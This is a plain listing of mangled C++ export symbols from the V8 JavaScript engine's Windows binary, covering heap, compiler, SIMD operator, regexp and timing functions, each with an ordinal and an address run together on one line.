                                  ?HasThreadSpecificCounterVariants@RuntimeCallStats@internal@v8@@QEAA_NW4RuntimeCallCounterId@23@@Z70500x1408557b0
                                  ?HasTypeProfileSlot@FeedbackVectorSpec@internal@v8@@QEBA_NXZ70510x1407f8dd0
                                  ?HasValidEntry@WasmModuleSourceMap@wasm@internal@v8@@QEBA_N_K0@Z70520x14052ab10
                                  ?Hash@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEBAHXZ70530x140423e40
                                  ?Hash@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEBAHXZ70540x140423e40
                                  ?Hash@FlagList@internal@v8@@SAIXZ70550x140968970
                                  ?Hash@IdentityMapBase@internal@v8@@AEBAH_K@Z70560x1405f34a0
                                  ?Hash@OrderedNameDictionaryHandler@internal@v8@@SAHVHeapObject@23@@Z70570x14075fdd0
                                  ?Hash@SharedFunctionInfo@internal@v8@@QEAAIXZ70580x140779c60
                                  ?Hash@StringTableShape@internal@v8@@SAIVReadOnlyRoots@23@PEAVStringTableKey@23@@Z70590x140423e50
                                  ?Hash@Version@internal@v8@@SAIXZ70600x14051a750
                                  ?HashCode@NodeProperties@compiler@internal@v8@@SA_KPEAVNode@234@@Z70610x140e44810
                                  ?HashCode@Operator@compiler@internal@v8@@UEBA_KXZ70620x14045b460
                                  ?HashForObject@GlobalDictionaryShape@internal@v8@@SAIVReadOnlyRoots@23@VObject@23@@Z70630x140423e60
                                  ?HashForObject@StringTableShape@internal@v8@@SAIVReadOnlyRoots@23@VObject@23@@Z70640x140423ea0
                                  ?HashIsolateForEmbeddedBlob@Isolate@internal@v8@@QEAA_KXZ70650x14097ea30
                                  ?HashTableStartIndex@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SAHXZ70660x14041c2b0
                                  ?HashTableStartIndex@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SAHXZ70670x14041c2b0
                                  ?HashTableStartOffset@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SAHXZ70680x1400b4900
                                  ?HashTableStartOffset@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SAHXZ70690x1400b4900
                                  ?HashToBucket@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAHH@Z70700x14041c2c0
                                  ?HashToBucket@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAHH@Z70710x14041c2c0
                                  ?HashToEntry@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAHH@Z70720x14041c2d0
                                  ?HashToEntry@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAHH@Z70730x14041c2d0
                                  ?Heap@AsmType@wasm@internal@v8@@SAPEAV1234@XZ70740x14041c2b0
                                  ?HeapConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VHeapObject@internal@v8@@@34@@Z70750x140e0adb0
                                  ?HeapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@V?$Handle@VHeapObject@internal@v8@@@34@@Z70760x140ea7230
                                  ?HeapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VHeapObject@internal@v8@@@34@V?$Handle@VHeapObject@internal@v8@@@34@@Z70770x140ec5400
                                  ?HeapConstant@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@V?$Handle@VHeapObject@internal@v8@@@34@@Z70780x140e6eb60
                                  ?HeapConstant@Type@compiler@internal@v8@@CA?AV1234@AEBVHeapObjectRef@234@PEAVZone@34@@Z70790x140e2f0a0
                                  ?HeapConstantOf@compiler@internal@v8@@YA?AV?$Handle@VHeapObject@internal@v8@@@23@PEBVOperator@123@@Z70800x140e0ae50
                                  ?HeapNumberMapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ70810x140ea7290
                                  ?HeapNumberMapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VMap@internal@v8@@@34@XZ70820x140ec5460
                                  ?HeapNumberShortPrint@HeapNumber@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z70830x140998960
                                  ?HeapNumberToString@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@V?$Handle@VHeapNumber@internal@v8@@@23@NW4NumberCacheMode@23@@Z70840x140946630
                                  ?HeapSizeFromPhysicalMemory@Heap@internal@v8@@SA_K_K@Z70850x1409326d0
                                  ?Heap_GenerationalBarrierForCodeSlow@internal@v8@@YAXVCode@12@PEAVRelocInfo@12@VHeapObject@12@@Z70860x140932770
                                  ?Heap_GenerationalBarrierSlow@internal@v8@@YAXVHeapObject@12@_K0@Z70870x1409303c0
                                  ?Heap_GenerationalEphemeronKeyBarrierSlow@internal@v8@@YAXPEAVHeap@12@VEphemeronHashTable@12@_K@Z70880x140932780
                                  ?Heap_MarkingBarrierForArrayBufferExtensionSlow@internal@v8@@YAXVHeapObject@12@PEAVArrayBufferExtension@12@@Z70890x140932790
                                  ?Heap_MarkingBarrierForCodeSlow@internal@v8@@YAXVCode@12@PEAVRelocInfo@12@VHeapObject@12@@Z70900x1409327a0
                                  ?Heap_MarkingBarrierForDescriptorArraySlow@internal@v8@@YAXPEAVHeap@12@VHeapObject@12@1H@Z70910x1409327d0
                                  ?Heap_MarkingBarrierSlow@internal@v8@@YAXVHeapObject@12@_K0@Z70920x140932810
                                  ?Heap_PageFlagsAreConsistent@internal@v8@@YA_NVHeapObject@12@@Z70930x140932840
                                  ?Heap_WriteBarrierForCodeSlow@internal@v8@@YAXVCode@12@@Z70940x140932850
                                  ?HighResolutionNow@TimeTicks@base@v8@@SA?AV123@XZ70950x140dc31d0
                                  ?HintRegister@UsePosition@compiler@internal@v8@@QEBA_NPEAH@Z70960x140ef7a00
                                  ?HintTypeForOperand@UsePosition@compiler@internal@v8@@SA?AW4UsePositionHintType@234@AEBVInstructionOperand@234@@Z70970x140ef7a80
                                  ?HoistSloppyBlockFunctions@DeclarationScope@internal@v8@@QEAAXPEAVAstNodeFactory@23@@Z70980x140a55750
                                  ?HolderIsReceiver@LookupIterator@internal@v8@@QEBA_NXZ70990x14079cf80
                                  ?HolderIsReceiverOrHiddenPrototype@LookupIterator@internal@v8@@QEBA_NXZ71000x14079cfa0
                                  ?Hole@Type@compiler@internal@v8@@SA?AV1234@XZ71010x14045b470
                                  ?HomeObjectSymbolConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ71020x1408948b0
                                  ?Hurry@IncrementalMarking@internal@v8@@QEAAXXZ71030x1409217a0
                                  ?I16x8Abs@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71040x140e13f60
                                  ?I16x8Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71050x140e14020
                                  ?I16x8AddHoriz@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71060x140e140e0
                                  ?I16x8AddSaturateS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71070x140e141a0
                                  ?I16x8AddSaturateU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71080x140e14260
                                  ?I16x8BitMask@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71090x140e14320
                                  ?I16x8Eq@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71100x140e143e0
                                  ?I16x8ExtractLaneS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71110x140e144a0
                                  ?I16x8ExtractLaneU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71120x140e14540
                                  ?I16x8GeS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71130x140e145e0
                                  ?I16x8GeU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71140x140e146a0
                                  ?I16x8GtS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71150x140e14760
                                  ?I16x8GtU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71160x140e14820
                                  ?I16x8MaxS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71170x140e148e0
                                  ?I16x8MaxU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71180x140e149a0
                                  ?I16x8MinS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71190x140e14a60
                                  ?I16x8MinU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71200x140e14b20
                                  ?I16x8Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71210x140e14be0
                                  ?I16x8Ne@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71220x140e14ca0
                                  ?I16x8Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71230x140e14d60
                                  ?I16x8ReplaceLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71240x140e14e20
                                  ?I16x8RoundingAverageU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71250x140e14ec0
                                  ?I16x8SConvertI32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71260x140e14f80
                                  ?I16x8SConvertI8x16High@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71270x140e15040
                                  ?I16x8SConvertI8x16Low@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71280x140e15100
                                  ?I16x8Shl@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71290x140e151c0
                                  ?I16x8ShrS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71300x140e15280
                                  ?I16x8ShrU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71310x140e15340
                                  ?I16x8Splat@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71320x140e15400
                                  ?I16x8Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71330x140e154c0
                                  ?I16x8SubSaturateS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71340x140e15580
                                  ?I16x8SubSaturateU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71350x140e15640
                                  ?I16x8UConvertI32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71360x140e15700
                                  ?I16x8UConvertI8x16High@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71370x140e157c0
                                  ?I16x8UConvertI8x16Low@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71380x140e15880
                                  ?I32x4Abs@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71390x140e15940
                                  ?I32x4Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71400x140e15a00
                                  ?I32x4AddHoriz@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71410x140e15ac0
                                  ?I32x4BitMask@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71420x140e15b80
                                  ?I32x4Eq@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71430x140e15c40
                                  ?I32x4ExtractLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71440x140e15d00
                                  ?I32x4GeS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71450x140e15da0
                                  ?I32x4GeU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71460x140e15e60
                                  ?I32x4GtS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71470x140e15f20
                                  ?I32x4GtU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71480x140e15fe0
                                  ?I32x4MaxS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71490x140e160a0
                                  ?I32x4MaxU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71500x140e16160
                                  ?I32x4MinS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71510x140e16220
                                  ?I32x4MinU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71520x140e162e0
                                  ?I32x4Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71530x140e163a0
                                  ?I32x4Ne@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71540x140e16460
                                  ?I32x4Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71550x140e16520
                                  ?I32x4ReplaceLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71560x140e165e0
                                  ?I32x4SConvertF32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71570x140e16680
                                  ?I32x4SConvertI16x8High@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71580x140e16740
                                  ?I32x4SConvertI16x8Low@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71590x140e16800
                                  ?I32x4Shl@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71600x140e168c0
                                  ?I32x4ShrS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71610x140e16980
                                  ?I32x4ShrU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71620x140e16a40
                                  ?I32x4Splat@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71630x140e16b00
                                  ?I32x4Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71640x140e16bc0
                                  ?I32x4UConvertF32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71650x140e16c80
                                  ?I32x4UConvertI16x8High@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71660x140e16d40
                                  ?I32x4UConvertI16x8Low@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71670x140e16e00
                                  ?I64x2Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71680x140e16ec0
                                  ?I64x2Eq@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71690x140e16f80
                                  ?I64x2ExtractLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71700x140e17040
                                  ?I64x2GeS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71710x140e170e0
                                  ?I64x2GeU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71720x140e171a0
                                  ?I64x2GtS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71730x140e17260
                                  ?I64x2GtU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71740x140e17320
                                  ?I64x2MaxS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71750x140e173e0
                                  ?I64x2MaxU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71760x140e174a0
                                  ?I64x2MinS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71770x140e17560
                                  ?I64x2MinU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71780x140e17620
                                  ?I64x2Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71790x140e176e0
                                  ?I64x2Ne@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71800x140e177a0
                                  ?I64x2Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71810x140e17860
                                  ?I64x2ReplaceLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71820x140e17920
                                  ?I64x2ReplaceLaneI32Pair@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71830x140e179c0
                                  ?I64x2Shl@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71840x140e17a60
                                  ?I64x2ShrS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71850x140e17b20
                                  ?I64x2ShrU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71860x140e17be0
                                  ?I64x2Splat@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71870x140e17ca0
                                  ?I64x2SplatI32Pair@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71880x140e17d60
                                  ?I64x2Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71890x140e17e20
                                  ?I8x16Abs@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71900x140e17ee0
                                  ?I8x16Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71910x140e17fa0
                                  ?I8x16AddSaturateS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71920x140e18060
                                  ?I8x16AddSaturateU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71930x140e18120
                                  ?I8x16BitMask@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71940x140e181e0
                                  ?I8x16Eq@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71950x140e182a0
                                  ?I8x16ExtractLaneS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71960x140e18360
                                  ?I8x16ExtractLaneU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71970x140e18400
                                  ?I8x16GeS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71980x140e184a0
                                  ?I8x16GeU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71990x140e18560
                                  ?I8x16GtS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72000x140e18620
                                  ?I8x16GtU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72010x140e186e0
                                  ?I8x16MaxS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72020x140e187a0
                                  ?I8x16MaxU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72030x140e18860
                                  ?I8x16MinS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72040x140e18920
                                  ?I8x16MinU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72050x140e189e0
                                  ?I8x16Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72060x140e18aa0
                                  ?I8x16Ne@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72070x140e18b60
                                  ?I8x16Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72080x140e18c20
                                  ?I8x16ReplaceLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z72090x140e18ce0
                                  ?I8x16RoundingAverageU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72100x140e18d80
                                  ?I8x16SConvertI16x8@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72110x140e18e40
                                  ?I8x16Shl@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72120x140e18f00
                                  ?I8x16ShrS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72130x140e18fc0
                                  ?I8x16ShrU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72140x140e19080
                                  ?I8x16Splat@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72150x140e19140
                                  ?I8x16Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72160x140e19200
                                  ?I8x16SubSaturateS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72170x140e192c0
                                  ?I8x16SubSaturateU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72180x140e19380
                                  ?I8x16UConvertI16x8@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72190x140e19440
                                  ?Id@Script@debug@v8@@QEBAHXZ72200x140a918f0
                                  ?IdentifierEquals@Parser@internal@v8@@AEAA_NPEBVAstRawString@23@0@Z72210x1406fb2d0
                                  ?IdentifyWeakUnmodifiedObjects@GlobalHandles@internal@v8@@QEAAXP6A_NVFullObjectSlot@23@@Z@Z72220x140965720
                                  ?IdleNotificationDeadline@Isolate@v8@@QEAA_NN@Z72230x140a91900
                                  ?IfDefault@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4BranchHint@234@@Z72240x140e0ae60
                                  ?IfException@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72250x140e0af00
                                  ?IfFalse@BranchMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ72260x140076c20
                                  ?IfFalse@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72270x140e0af10
                                  ?IfFalse@DiamondMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ72280x140076c30
                                  ?IfProjectionsAreOwned@DiamondMatcher@compiler@internal@v8@@QEBA_NXZ72290x14045b480
                                  ?IfRegisterEqPos@RegExpBytecodeGenerator@internal@v8@@UEAAXHPEAVLabel@23@@Z72300x1406ca430
                                  ?IfRegisterEqPos@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z72310x1404469e0
                                  ?IfRegisterGE@RegExpBytecodeGenerator@internal@v8@@UEAAXHHPEAVLabel@23@@Z72320x1406ca500
                                  ?IfRegisterGE@RegExpMacroAssemblerX64@internal@v8@@UEAAXHHPEAVLabel@23@@Z72330x140446aa0
                                  ?IfRegisterLT@RegExpBytecodeGenerator@internal@v8@@UEAAXHHPEAVLabel@23@@Z72340x1406ca5f0
                                  ?IfRegisterLT@RegExpMacroAssemblerX64@internal@v8@@UEAAXHHPEAVLabel@23@@Z72350x140446b60
                                  ?IfSuccess@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72360x140e0af20
                                  ?IfTrue@BranchMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ72370x140076c50
                                  ?IfTrue@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72380x140e0af30
                                  ?IfTrue@DiamondMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ72390x140076c20
                                  ?IfValue@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@HHW4BranchHint@234@@Z72400x140e0af40
                                  ?IfValueParametersOf@compiler@internal@v8@@YAAEBVIfValueParameters@123@PEBVOperator@123@@Z72410x1402e6a30
                                  ?IgnoreCompletion@Parser@internal@v8@@AEAAPEAVBlock@23@PEAVStatement@23@@Z72420x14072fe90
                                  ?Implementation@RegExpBytecodeGenerator@internal@v8@@UEAA?AW4IrregexpImplementation@RegExpMacroAssembler@23@XZ72430x1406ca6e0
                                  ?Implementation@RegExpMacroAssemblerX64@internal@v8@@UEAA?AW4IrregexpImplementation@RegExpMacroAssembler@23@XZ72440x140446c20
                                  ?ImportMetaExpression@Parser@internal@v8@@AEAAPEAVExpression@23@H@Z72450x14072ff10
                                  ?ImportNativeModule@WasmEngine@wasm@internal@v8@@QEAA?AV?$Handle@VWasmModuleObject@internal@v8@@@34@PEAVIsolate@34@V?$shared_ptr@VNativeModule@wasm@internal@v8@@@std@@V?$Vector@$$CBD@34@@Z72460x14055fc30
                                  ?InContext@Isolate@v8@@QEAA_NXZ72470x140a91920
                                  ?InDays@TimeDelta@base@v8@@QEBAHXZ72480x140dc3200
                                  ?InHours@TimeDelta@base@v8@@QEBAHXZ72490x140dc3230
                                  ?InLargeObjectSpace@MemoryChunk@internal@v8@@QEBA_NXZ72500x1408d36a0
                                  ?InMicroseconds@TimeDelta@base@v8@@QEBA_JXZ72510x140dc3270
                                  ?InMilliseconds@TimeDelta@base@v8@@QEBA_JXZ72520x140dc3290
                                  ?InMillisecondsF@TimeDelta@base@v8@@QEBANXZ72530x140dc32c0
                                  ?InMillisecondsRoundedUp@TimeDelta@base@v8@@QEBA_JXZ72540x140dc32f0
                                  ?InMinutes@TimeDelta@base@v8@@QEBAHXZ72550x140dc3330
                                  ?InNanoseconds@TimeDelta@base@v8@@QEBA_JXZ72560x140dc3370
                                  ?InOffThreadSpace@Heap@internal@v8@@SA_NVHeapObject@23@@Z72570x140932c80
                                  ?InRecursiveGC@GlobalHandles@internal@v8@@AEAA_NI@Z72580x1409657d0
                                  ?InSeconds@TimeDelta@base@v8@@QEBA_JXZ72590x140dc3390
                                  ?InSecondsF@TimeDelta@base@v8@@QEBANXZ72600x140dc33c0
                                  ?InSpace@Heap@internal@v8@@QEAA_NVHeapObject@23@W4AllocationSpace@23@@Z72610x140932cc0
                                  ?InSpaceSlow@Heap@internal@v8@@QEAA_N_KW4AllocationSpace@23@@Z72620x140932de0
                                  ?InUse@LocalEmbedderHeapTracer@internal@v8@@QEBA_NXZ72630x14045c8b0
                                  ?IncBlockCounter@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@H@Z72640x1408948c0
                                  ?IncRef@WasmCode@wasm@internal@v8@@QEAAXXZ72650x140423ed0
                                  ?IncreaseAllocatedBytes@PagedSpace@internal@v8@@QEAAX_KPEAVPage@23@@Z72660x140423ee0
                                  ?IncreaseAllocatedSize@EmbedderHeapTracer@v8@@QEAAX_K@Z72670x140a91930
                                  ?IncreaseAllocatedSize@LocalEmbedderHeapTracer@internal@v8@@QEAAX_K@Z72680x1408cbf70
                                  ?IncreaseBaseAddressOffset@EhFrameWriter@internal@v8@@QEAAXH@Z72690x140448480
                                  ?IncreaseCapacity@PagedSpace@internal@v8@@QEAAX_K@Z72700x140423ef0
                                  ?IncreaseHeapLimitForDebugging@Isolate@v8@@QEAAXXZ72710x1400768e0
                                  ?IncreaseSelfTicks@ProfileNode@internal@v8@@QEAAXI@Z72720x1406cca50
                                  ?IncreaseTotalRegexpCodeGenerated@Isolate@internal@v8@@QEAAXV?$Handle@VHeapObject@internal@v8@@@23@@Z72730x14097ead0
                                  ?Increment@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72740x140e0ca60
                                  ?Increment@StatsCounterThreadSafe@internal@v8@@QEAAXH@Z72750x1408557c0
                                  ?Increment@StatsCounterThreadSafe@internal@v8@@QEAAXXZ72760x140855810
                                  ?IncrementCounter@MacroAssembler@internal@v8@@QEAAXPEAVStatsCounter@23@H@Z72770x14049a8f0
                                  ?IncrementExternalBackingStoreBytes@Space@internal@v8@@QEAAXW4ExternalBackingStoreType@23@_K@Z72780x14041b170
                                  ?IncrementExternalSize@NativeContextStats@internal@v8@@AEAAX_KVMap@23@VHeapObject@23@@Z72790x1408ed980
                                  ?IncrementLineTicks@ProfileNode@internal@v8@@QEAAXH@Z72800x1406d6130
                                  ?IncrementMicrotasksScopeDepth@MicrotaskQueue@internal@v8@@QEAAXXZ72810x140610240
                                  ?IncrementMicrotasksSuppressions@MicrotaskQueue@internal@v8@@QEAAXXZ72820x140610250
                                  ?IncrementSelfTicks@ProfileNode@internal@v8@@QEAAXXZ72830x1406cca60
                                  ?IncrementSize@NativeContextStats@internal@v8@@QEAAX_KVMap@23@VHeapObject@23@0@Z72840x14090a550
                                  ?IncrementTracingIndentation@JSHeapBroker@compiler@internal@v8@@QEAAXXZ72850x140de4e80
                                  ?IncrementUnscheduledUseCount@Scheduler@compiler@internal@v8@@AEAAXPEAVNode@234@H0@Z72860x140fb8a50
                                  ?IncrementalMarkingSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ72870x14093fee0
                                  ?IndexInCell@Bitmap@internal@v8@@SAII@Z72880x140423f20
                                  ?IndexToCell@Bitmap@internal@v8@@SAII@Z72890x140423f30
                                  ?IndexToEntry@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72900x14077aec0
                                  ?IndexToEntry@?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72910x140423f40
                                  ?IndexToEntry@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AVInternalIndex@23@H@Z72920x140423f60
